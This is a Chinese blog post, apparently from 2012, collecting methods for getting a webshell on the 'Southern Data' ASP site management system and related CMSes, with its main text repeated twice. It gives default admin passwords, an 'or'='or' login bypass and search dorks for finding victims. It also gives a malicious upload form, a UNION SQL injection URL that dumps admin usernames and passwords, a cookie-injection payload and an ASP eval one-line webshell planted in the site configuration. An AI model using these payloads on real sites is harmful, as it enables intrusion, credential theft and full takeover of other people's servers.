南方数据管理系统拿shell(一个小小的总结)
2012-06-25 13:26
921 查看
默认:
admin admin
admin admin888
'or'='or'
默认数据库Databases/079lidc.mdb
改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp
抓包 明小子上传
注:通杀南方数据 良精系统 网软天下等
http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='
w78cms网站管理系统
关键词 inurl:ShopMore.asp?id
利用页面 /admin/ewebeditor/admin 默认账号密码 admin 198625
关键词:inurl:alogin.asp
木马上传后缀:asp;.asp.jpg
admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp
1.通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.target.com/upfile_Other.asp"; method=post
encType=multipart/form-data><INPUT class="tx1" type=file size=30 name=FileName> <INPUT class="tx1" type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer asa或asp文件上传,后面需要加一个空格
2.Sql注入
http://www.target.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入
"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp
这里一句话chr(32)密码是"#"
3.cookie注入
清空地址栏,利用union语句来注入,提交:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
用刺猬大哥的cookie注入转换工具亦可
admin admin
admin admin888
'or'='or'
默认数据库Databases/079lidc.mdb
改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp
抓包 明小子上传
注:通杀南方数据 良精系统 网软天下等
http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='
w78cms网站管理系统
关键词 inurl:ShopMore.asp?id
利用页面 /admin/ewebeditor/admin 默认账号密码 admin 198625
关键词:inurl:alogin.asp
木马上传后缀:asp;.asp.jpg
admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp
1.通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.target.com/upfile_Other.asp"; method=post
encType=multipart/form-data><INPUT class="tx1" type=file size=30 name=FileName> <INPUT class="tx1" type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer asa或asp文件上传,后面需要加一个空格
2.Sql注入
http://www.target.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入
"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp
这里一句话chr(32)密码是"#"
3.cookie注入
清空地址栏,利用union语句来注入,提交:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
用刺猬大哥的cookie注入转换工具亦可
相关文章推荐
- 关于数据绑定的一个小小的总结:绑定数据到List类型的控件(RadioButtonList,ListBox等),双重绑定。
- Linux--用shell写一个学生成绩管理系统
- 【分享】一个通用强大的主数据管理系统(架构设计讲解及源码下载)
- 在家看孩子,10分钟生成一个业务管理系统【能支持多数据库,大数据,流程审批,权限控制,即时提醒】,视频讲解详细实现步骤
- 最近做了一个小小的系统,收获挺大的....我想总结一下
- 最近开发一个SQL server大数据量统计系统的经验总结(转)
- Visual Studio 连接 Mysql 实现一个选课管理系统--->提取数据的几种方法
- [Asp.net] 一个基于B/S会员管理系统的知识总结
- mini学生管理系统。。。全部代码,4个java文件放在同一个包下面即可。用JDBC调用数据库取出数据。
- 数据类型简单总结及学生信息管理系统的调试
- Laxcus大数据管理系统2.0(13)- 总结
- 最近开发一个SQL server大数据量统计系统的经验总结
- 刚从网上找的一个学生数据管理系统的代码。
- 三维数据管理&浏览BS系统项目总结
- 摘要:本篇是本人在做一个大数据项目时,对于系统架构的一点总结,如何在保证存储量的情况下,又能保证数据的检索速度。
- 最近开发一个SQL server大数据量统计系统的经验总结
- Laxcus大数据管理系统2.0(13)- 总结
- 最近开发一个SQL server大数据量统计系统的经验总结
- 【分享】一个通用强大的主数据管理系统(架构设计讲解及源码下载)
- (转载)使用SQL-Server创建一个银行数据管理系统Ⅰ